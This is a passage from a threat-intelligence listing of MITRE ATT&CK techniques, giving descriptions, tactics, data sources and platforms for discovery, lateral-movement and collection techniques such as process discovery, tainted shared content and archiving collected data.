Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre